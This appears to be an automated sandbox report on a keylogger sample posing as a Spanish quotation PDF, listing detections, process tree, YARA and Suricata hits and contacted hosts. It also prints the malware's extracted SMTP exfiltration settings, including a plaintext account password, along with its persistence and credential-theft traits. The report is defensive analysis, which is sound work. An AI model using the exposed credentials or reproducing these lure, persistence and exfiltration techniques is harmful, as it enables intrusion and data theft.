Edit tour

Windows Analysis Report
Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Overview

General Information

Sample name:	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe renamed because original name is a hash value
Original sample name:	Nuevo pedido de cotizacin 663837 4899272.pdf.exe
Analysis ID:	1577456
MD5:	7d291da9b6e5251a9a22673230884b5f
SHA1:	95b9391bc0315edbd30ceabe0c272256d83bdd8c
SHA256:	7d7a7efa7daf9bb3031e0210f6e66cf756f1efdf8b9a95de6ea510a0fd3df5d8
Tags:	exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Suspicious Double Extension File Execution

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Generic Downloader

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates processes with suspicious names

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe (PID: 5248 cmdline: "C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe" MD5: 7D291DA9B6E5251A9A22673230884B5F)

palladiums.exe (PID: 5812 cmdline: "C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe" MD5: 7D291DA9B6E5251A9A22673230884B5F)

RegSvcs.exe (PID: 6096 cmdline: "C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 6668 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

palladiums.exe (PID: 3648 cmdline: "C:\Users\user\AppData\Local\silvexes\palladiums.exe" MD5: 7D291DA9B6E5251A9A22673230884B5F)

RegSvcs.exe (PID: 4268 cmdline: "C:\Users\user\AppData\Local\silvexes\palladiums.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.4574423762.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4574535869.0000000002B71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e13a:$a1: get_encryptedPassword 0x2e457:$a2: get_encryptedUsername 0x2df4a:$a3: get_timePasswordChanged 0x2e053:$a4: get_passwordField 0x2e150:$a5: set_encryptedPassword 0x2f80a:$a7: get_logins 0x2f76d:$a10: KeyLoggerEventArgs 0x2f3d2:$a11: KeyLoggerEventArgsEventHandler
00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3be4a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b4ed:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b74a:$a4: \Orbitum\User Data\Default\Login Data 0x3c129:$a5: \Kometa\User Data\Default\Login Data
00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ed7f:$s1: UnHook 0x2ed86:$s2: SetHook 0x2ed8e:$s3: CallNextHook 0x2ed9b:$s4: _hook
00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e13a:$a1: get_encryptedPassword 0x2e457:$a2: get_encryptedUsername 0x2df4a:$a3: get_timePasswordChanged 0x2e053:$a4: get_passwordField 0x2e150:$a5: set_encryptedPassword 0x2f80a:$a7: get_logins 0x2f76d:$a10: KeyLoggerEventArgs 0x2f3d2:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3be4a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b4ed:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b74a:$a4: \Orbitum\User Data\Default\Login Data 0x3c129:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ed7f:$s1: UnHook 0x2ed86:$s2: SetHook 0x2ed8e:$s3: CallNextHook 0x2ed9b:$s4: _hook
00000003.00000002.4574535869.0000000002C7A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: palladiums.exe PID: 5812	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: palladiums.exe PID: 5812	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: palladiums.exe PID: 5812	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: palladiums.exe PID: 5812	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1194f04:$a1: get_encryptedPassword 0x1195217:$a2: get_encryptedUsername 0x1194d1e:$a3: get_timePasswordChanged 0x1194e27:$a4: get_passwordField 0x1194f1a:$a5: set_encryptedPassword 0x11973c8:$a7: get_logins 0x119732b:$a10: KeyLoggerEventArgs 0x1196f94:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 6096	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 6096	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 6096	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: palladiums.exe PID: 3648	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: palladiums.exe PID: 3648	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: palladiums.exe PID: 3648	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: palladiums.exe PID: 3648	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf704a2:$a1: get_encryptedPassword 0xf707b5:$a2: get_encryptedUsername 0xf702bc:$a3: get_timePasswordChanged 0xf703c5:$a4: get_passwordField 0xf704b8:$a5: set_encryptedPassword 0xf72966:$a7: get_logins 0xf728c9:$a10: KeyLoggerEventArgs 0xf72532:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 4268	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 4268	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.palladiums.exe.e20000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.palladiums.exe.e20000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.palladiums.exe.e20000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.palladiums.exe.e20000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c33a:$a1: get_encryptedPassword 0x2c657:$a2: get_encryptedUsername 0x2c14a:$a3: get_timePasswordChanged 0x2c253:$a4: get_passwordField 0x2c350:$a5: set_encryptedPassword 0x2da0a:$a7: get_logins 0x2d96d:$a10: KeyLoggerEventArgs 0x2d5d2:$a11: KeyLoggerEventArgsEventHandler
6.2.palladiums.exe.e20000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a04a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x396ed:$a3: \Google\Chrome\User Data\Default\Login Data 0x3994a:$a4: \Orbitum\User Data\Default\Login Data 0x3a329:$a5: \Kometa\User Data\Default\Login Data
6.2.palladiums.exe.e20000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2cf7f:$s1: UnHook 0x2cf86:$s2: SetHook 0x2cf8e:$s3: CallNextHook 0x2cf9b:$s4: _hook
2.2.palladiums.exe.3880000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.palladiums.exe.3880000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.palladiums.exe.3880000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.palladiums.exe.3880000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c33a:$a1: get_encryptedPassword 0x2c657:$a2: get_encryptedUsername 0x2c14a:$a3: get_timePasswordChanged 0x2c253:$a4: get_passwordField 0x2c350:$a5: set_encryptedPassword 0x2da0a:$a7: get_logins 0x2d96d:$a10: KeyLoggerEventArgs 0x2d5d2:$a11: KeyLoggerEventArgsEventHandler
2.2.palladiums.exe.3880000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a04a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x396ed:$a3: \Google\Chrome\User Data\Default\Login Data 0x3994a:$a4: \Orbitum\User Data\Default\Login Data 0x3a329:$a5: \Kometa\User Data\Default\Login Data
2.2.palladiums.exe.3880000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2cf7f:$s1: UnHook 0x2cf86:$s2: SetHook 0x2cf8e:$s3: CallNextHook 0x2cf9b:$s4: _hook
2.2.palladiums.exe.3880000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.palladiums.exe.3880000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.palladiums.exe.3880000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.palladiums.exe.3880000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3be4a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b4ed:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b74a:$a4: \Orbitum\User Data\Default\Login Data 0x3c129:$a5: \Kometa\User Data\Default\Login Data
3.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ed7f:$s1: UnHook 0x2ed86:$s2: SetHook 0x2ed8e:$s3: CallNextHook 0x2ed9b:$s4: _hook
2.2.palladiums.exe.3880000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e13a:$a1: get_encryptedPassword 0x2e457:$a2: get_encryptedUsername 0x2df4a:$a3: get_timePasswordChanged 0x2e053:$a4: get_passwordField 0x2e150:$a5: set_encryptedPassword 0x2f80a:$a7: get_logins 0x2f76d:$a10: KeyLoggerEventArgs 0x2f3d2:$a11: KeyLoggerEventArgsEventHandler
2.2.palladiums.exe.3880000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3be4a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b4ed:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b74a:$a4: \Orbitum\User Data\Default\Login Data 0x3c129:$a5: \Kometa\User Data\Default\Login Data
2.2.palladiums.exe.3880000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ed7f:$s1: UnHook 0x2ed86:$s2: SetHook 0x2ed8e:$s3: CallNextHook 0x2ed9b:$s4: _hook
6.2.palladiums.exe.e20000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.palladiums.exe.e20000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.palladiums.exe.e20000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.palladiums.exe.e20000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.palladiums.exe.e20000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e13a:$a1: get_encryptedPassword 0x2e457:$a2: get_encryptedUsername 0x2df4a:$a3: get_timePasswordChanged 0x2e053:$a4: get_passwordField 0x2e150:$a5: set_encryptedPassword 0x2f80a:$a7: get_logins 0x2f76d:$a10: KeyLoggerEventArgs 0x2f3d2:$a11: KeyLoggerEventArgsEventHandler
6.2.palladiums.exe.e20000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3be4a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b4ed:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b74a:$a4: \Orbitum\User Data\Default\Login Data 0x3c129:$a5: \Kometa\User Data\Default\Login Data
6.2.palladiums.exe.e20000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ed7f:$s1: UnHook 0x2ed86:$s2: SetHook 0x2ed8e:$s3: CallNextHook 0x2ed9b:$s4: _hook
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe", CommandLine: "C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe", CommandLine|base64offset|contains: bv, Image: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe, NewProcessName: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe", ProcessId: 5248, ProcessName: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , ProcessId: 6668, ProcessName: wscript.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 3.130.71.34, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 6096, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49828

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs" , ProcessId: 6668, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\silvexes\palladiums.exe, ProcessId: 5812, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:44:51.040239+0100	2803305	3	Unknown Traffic	192.168.2.5	49706	104.21.67.152	443	TCP
2024-12-18T13:44:57.354578+0100	2803305	3	Unknown Traffic	192.168.2.5	49722	104.21.67.152	443	TCP
2024-12-18T13:45:20.956418+0100	2803305	3	Unknown Traffic	192.168.2.5	49783	104.21.67.152	443	TCP
2024-12-18T13:45:42.962338+0100	2803305	3	Unknown Traffic	192.168.2.5	49851	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T13:44:47.019850+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	132.226.247.73	80	TCP
2024-12-18T13:44:49.426083+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	132.226.247.73	80	TCP
2024-12-18T13:44:52.535462+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49708	132.226.247.73	80	TCP
2024-12-18T13:45:14.457932+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49738	132.226.247.73	80	TCP
2024-12-18T13:45:17.207330+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49738	132.226.247.73	80	TCP
2024-12-18T13:45:19.347916+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49738	132.226.247.73	80	TCP
2024-12-18T13:45:22.441745+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49790	132.226.247.73	80	TCP
2024-12-18T13:45:26.535476+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49800	132.226.247.73	80	TCP
2024-12-18T13:45:29.629183+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49812	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe

Avira: detection malicious, Label: HEUR/AGEN.1319493

Found malware configuration

Source: 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587", "Version": "4.4"}
Source: 6.2.palladiums.exe.e20000.1.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

ReversingLabs: Detection: 66%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49776 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49857 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: palladiums.exe, 00000002.00000003.2157427033.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000002.00000003.2157794199.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000006.00000003.2319100911.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000006.00000003.2318484844.0000000003800000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: palladiums.exe, 00000002.00000003.2157427033.0000000003F30000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000002.00000003.2157794199.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000006.00000003.2319100911.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, palladiums.exe, 00000006.00000003.2318484844.0000000003800000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0026DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0026DBBE
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0023C2A2 FindFirstFileExW,	0_2_0023C2A2
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_002768EE FindFirstFileW,FindClose,	0_2_002768EE
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0027698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0027698F
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0026D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0026D076
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0026D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0026D3A9
